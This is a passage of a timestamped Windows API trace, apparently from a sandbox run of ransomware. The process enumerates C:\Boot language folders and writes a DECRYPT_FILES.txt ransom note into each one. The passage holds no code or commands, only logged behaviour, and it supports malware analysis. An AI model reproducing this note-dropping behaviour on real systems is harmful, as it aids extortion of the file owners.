hFindFile=0x1a5de030) returned 1 [0054.104] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x16d240) returned 1 [0054.104] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x16d200) returned 1 [0054.104] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x16d2f0) returned 1 [0054.104] GetFullPathNameW (in: lpFileName="C:\\Boot\\nl-NL", nBufferLength=0x105, lpBuffer=0x16cde0, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\nl-NL", lpFilePart=0x0) returned 0xd [0054.104] GetFullPathNameW (in: lpFileName="C:\\Boot\\nl-NL\\", nBufferLength=0x105, lpBuffer=0x16cd80, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\nl-NL\\", lpFilePart=0x0) returned 0xe [0054.104] FindFirstFileW (in: lpFileName="C:\\Boot\\nl-NL\\*", lpFindFileData=0x16cf90 | out: lpFindFileData=0x16cf90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5de030 [0054.104] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x16cfe0 | out: lpFindFileData=0x16cfe0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0054.104] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x16cfe0 | out: lpFindFileData=0x16cfe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe84c457e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0054.104] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x16cfe0 | out: lpFindFileData=0x16cfe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe84c457e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0054.104] FindClose (in: hFindFile=0x1a5de030 | out: hFindFile=0x1a5de030) returned 1 [0054.105] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x16d240) returned 1 [0054.105] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x16d200) returned 1 [0054.105] GetFullPathNameW (in: lpFileName="C:\\Boot\\nl-NL\\DECRYPT_FILES.txt", nBufferLength=0x105, lpBuffer=0x16cd80, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\nl-NL\\DECRYPT_FILES.txt", lpFilePart=0x0) returned 0x1f [0054.105] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x16d260) returned 1 [0054.105] CreateFileW (lpFileName="C:\\Boot\\nl-NL\\DECRYPT_FILES.txt" (normalized: "c:\\boot\\nl-nl\\decrypt_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x408 [0054.105] GetFileType (hFile=0x408) returned 0x1 [0054.105] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x16d1d0) returned 1 [0054.105] GetFileType (hFile=0x408) returned 0x1 [0054.105] WriteFile (in: hFile=0x408, lpBuffer=0x21c7458*, nNumberOfBytesToWrite=0x9d5, lpNumberOfBytesWritten=0x16d2a8, lpOverlapped=0x0 | out: lpBuffer=0x21c7458*, lpNumberOfBytesWritten=0x16d2a8*=0x9d5, lpOverlapped=0x0) returned 1 [0054.106] CloseHandle (hObject=0x408) returned 1 [0054.106] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x16d2f0) returned 1 [0054.106] GetFullPathNameW (in: lpFileName="C:\\Boot\\pl-PL", nBufferLength=0x105, lpBuffer=0x16cde0, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\pl-PL", lpFilePart=0x0) returned 0xd [0054.106] GetFullPathNameW (in: lpFileName="C:\\Boot\\pl-PL\\", nBufferLength=0x105, lpBuffer=0x16cd80, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\pl-PL\\", lpFilePart=0x0) returned 0xe [0054.107] FindFirstFileW (in: lpFileName="C:\\Boot\\pl-PL\\*", lpFindFileData=0x16cf90 | out: lpFindFileData=0x16cf90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5de030 [0054.107] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x16cfe0 | out: lpFindFileData=0x16cfe0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0054.107] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x16cfe0 | out: lpFindFileData=0x16cfe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe9e5ad4a, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0054.107] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x16cfe0 | out: lpFindFileData=0x16cfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0054.107] FindClose (in: hFindFile=0x1a5de030 | out: hFindFile=0x1a5de030) returned 1 [0054.107] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x16d240) returned 1 [0054.107] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x16d200) returned 1 [0054.107] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x16d2f0) returned 1 [0054.107] GetFullPathNameW (in: lpFileName="C:\\Boot\\pl-PL", nBufferLength=0x105, lpBuffer=0x16cde0, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\pl-PL", lpFilePart=0x0) returned 0xd [0054.107] GetFullPathNameW (in: lpFileName="C:\\Boot\\pl-PL\\", nBufferLength=0x105, lpBuffer=0x16cd80, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\pl-PL\\", lpFilePart=0x0) returned 0xe [0054.108] FindFirstFileW (in: lpFileName="C:\\Boot\\pl-PL\\*", lpFindFileData=0x16cf90 | out: lpFindFileData=0x16cf90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5de030 [0054.108] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x16cfe0 | out: lpFindFileData=0x16cfe0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0054.108] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x16cfe0 | out: lpFindFileData=0x16cfe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe9e5ad4a, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0054.108] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x16cfe0 | out: lpFindFileData=0x16cfe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe9e5ad4a, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0054.108] FindClose (in: hFindFile=0x1a5de030 | out: hFindFile=0x1a5de030) returned 1 [0054.108] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x16d240) returned 1 [0054.108] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x16d200) returned 1 [0054.108] GetFullPathNameW (in: lpFileName="C:\\Boot\\pl-PL\\DECRYPT_FILES.txt", nBufferLength=0x105, lpBuffer=0x16cd80, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\pl-PL\\DECRYPT_FILES.txt", lpFilePart=0x0) returned 0x1f [0054.108] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x16d260) returned 1 [0054.108] CreateFileW (lpFileName="C:\\Boot\\pl-PL\\DECRYPT_FILES.txt" (normalized: "c:\\boot\\pl-pl\\decrypt_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x408 [0054.109] GetFileType (hFile=0x408) returned 0x1 [0054.109] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x16d1d0) returned 1 [0054.109] GetFileType (hFile=0x408) returned 0x1 [0054.109] WriteFile (in: hFile=0x408, lpBuffer=0x21cae80*, nNumberOfBytesToWrite=0x9d5, lpNumberOfBytesWritten=0x16d2a8, lpOverlapped=0x0 | out: lpBuffer=0x21cae80*, lpNumberOfBytesWritten=0x16d2a8*=0x9d5, lpOverlapped=0x0) returned 1 [0054.110] CloseHandle (hObject=0x408) returned 1 [0054.110] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x16d2f0) returned 1 [0054.110] GetFullPathNameW (in: lpFileName="C:\\Boot\\pt-BR", nBufferLength=0x105, lpBuffer=0x16cde0, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\pt-BR", lpFilePart=0x0) returned 0xd [0054.110] GetFullPathNameW (in: lpFileName="C:\\Boot\\pt-BR\\", nBufferLength=0x105, lpBuffer=0x16cd80, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\pt-BR\\", lpFilePart=0x0) returned 0xe [0054.110] FindFirstFileW (in: lpFileName="C:\\Boot\\pt-BR\\*", lpFindFileData=0x16cf90 | out: lpFindFileData=0x16cf90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5de030 [0054.179] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x16cfe0 | out: lpFindFileData=0x16cfe0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0054.194] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x16cfe0 | out: lpFindFileData=0x16cfe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe83b9c0f, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16040, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0054.194] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x16cfe0 | out: lpFindFileData=0x16cfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0054.194] FindClose (in: hFindFile=0x1a5de030 | out: hFindFile=0x1a5de030) returned 1 [0054.194] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x16d240) returned 1 [0054.194] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x16d200) returned 1 [0054.194] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x16d2f0) returned 1 [0054.194] GetFullPathNameW (in: lpFileName="C:\\Boot\\pt-BR", nBufferLength=0x105, lpBuffer=0x16cde0, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\pt-BR", lpFilePart=0x0) returned 0xd [0054.194] GetFullPathNameW (in: lpFileName="C:\\Boot\\pt-BR\\", nBufferLength=0x105, lpBuffer=0x16cd80, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\pt-BR\\", lpFilePart=0x0) returned 0xe [0054.194] FindFirstFileW (in: lpFileName="C:\\Boot\\pt-BR\\*", lpFindFileData=0x16cf90 | out: lpFindFileData=0x16cf90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5de030 [0054.195] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x16cfe0 | out: lpFindFileData=0x16cfe0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0054.195] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x16cfe0 | out: lpFindFileData=0x16cfe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe83b9c0f, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16040, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0054.195] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x16cfe0 | out: lpFindFileData=0x16cfe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe83b9c0f, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16040, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0054.195] FindClose (in: hFindFile=0x1a5de030 | out: hFindFile=0x1a5de030) returned 1 [0054.195] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x16d240) returned 1 [0054.195] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x16d200) returned 1 [0054.195] GetFullPathNameW (in: lpFileName="C:\\Boot\\pt-BR\\DECRYPT_FILES.txt", nBufferLength=0x105, lpBuffer=0x16cd80, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\pt-BR\\DECRYPT_FILES.txt", lpFilePart=0x0) returned 0x1f [0054.195] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x16d260) returned 1 [0054.195] CreateFileW (lpFileName="C:\\Boot\\pt-BR\\DECRYPT_FILES.txt" (normalized: "c:\\boot\\pt-br\\decrypt_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x408 [0054.196] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x16d1d0) returned 1 [0054.196] WriteFile (in: hFile=0x408, lpBuffer=0x21ffec8*, nNumberOfBytesToWrite=0x9d5, lpNumberOfBytesWritten=0x16d2a8, lpOverlapped=0x0 | out: lpBuffer=0x21ffec8*, lpNumberOfBytesWritten=0x16d2a8*=0x9d5, lpOverlapped=0x0) returned 1 [0054.198] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x16d2f0) returned 1 [0054.198] GetFullPathNameW (in: lpFileName="C:\\Boot\\pt-PT", nBufferLength=0x105, lpBuffer=0x16cde0, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\pt-PT", lpFilePart=0x0) returned 0xd [0054.198] GetFullPathNameW (in: lpFileName="C:\\Boot\\pt-PT\\", nBufferLength=0x105, lpBuffer=0x16cd80, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\pt-PT\\", lpFilePart=0x0) returned 0xe [0054.198] FindFirstFileW (in: lpFileName="C:\\Boot\\pt-PT\\*", lpFindFileData=0x16cf90 | out: lpFindFileData=0x16cf90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5de030 [0054.198] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x16cfe0 | out: lpFindFileData=0x16cfe0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0054.199] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x16cfe0 | out: lpFindFileData=0x16cfe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe823ce95, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15e40, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0054.199] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x16cfe0 | out: lpFindFileData=0x16cfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0054.199] FindClose (in: hFindFile=0x1a5de030 | out: hFindFile=0x1a5de030) returned 1 [0054.199] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x16d240) returned 1 [0054.199] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x16d200) returned 1 [0054.199] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x16d2f0) returned 1 [0054.199] GetFullPathNameW (in: lpFileName="C:\\Boot\\pt-PT", nBufferLength=0x105, lpBuffer=0x16cde0, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\pt-PT", lpFilePart=0x0) returned 0xd [0054.199] GetFullPathNameW (in: lpFileName="C:\\Boot\\pt-PT\\", nBufferLength=0x105, lpBuffer=0x16cd80, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\pt-PT\\", lpFilePart=0x0) returned 0xe [0054.199] FindFirstFileW (in: lpFileName="C:\\Boot\\pt-PT\\*", lpFindFileData=0x16cf90 | out: lpFindFileData=0x16cf90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5de030 [0054.199] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x16cfe0 | out: lpFindFileData=0x16cfe0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0054.199] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x16cfe0 | out: lpFindFileData=0x16cfe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe823ce95, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15e40, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0054.200] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x16cfe0 | out: lpFindFileData=0x16cfe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe823ce95, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15e40, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0054.200] FindClose (in: hFindFile=0x1a5de030 | out: hFindFile=0x1a5de030) returned 1 [0054.200] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x16d240) returned 1 [0054.200] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x16d200) returned 1 [0054.200] GetFullPathNameW (in: lpFileName="C:\\Boot\\pt-PT\\DECRYPT_FILES.txt", nBufferLength=0x105, lpBuffer=0x16cd80, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\pt-PT\\DECRYPT_FILES.txt", lpFilePart=0x0) returned 0x1f [0054.200] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x16d260) returned 1 [0054.200] CreateFileW (lpFileName="C:\\Boot\\pt-PT\\DECRYPT_FILES.txt" (normalized: "c:\\boot\\pt-pt\\decrypt_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x408 [0054.200] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x16d1d0) returned 1 [0054.201] WriteFile (in: hFile=0x408, lpBuffer=0x22038f0*, nNumberOfBytesToWrite=0x9d5, lpNumberOfBytesWritten=0x16d2a8, lpOverlapped=0x0 | out: lpBuffer=0x22038f0*, lpNumberOfBytesWritten=0x16d2a8*=0x9d5, lpOverlapped=0x0) returned 1 [0054.201] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x16d2f0) returned 1 [0054.201] GetFullPathNameW (in: lpFileName="C:\\Boot\\ru-RU", nBufferLength=0x105, lpBuffer=0x16cde0, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\ru-RU", lpFilePart=0x0) returned 0xd [0054.201] GetFullPathNameW (in: lpFileName="C:\\Boot\\ru-RU\\", nBufferLength=0x105, lpBuffer=0x16cd80, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\ru-RU\\", lpFilePart=0x0) returned 0xe [0054.202] FindFirstFileW (in: lpFileName="C:\\Boot\\ru-RU\\*", lpFindFileData=0x16cf90 | out: lpFindFileData=0x16cf90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, 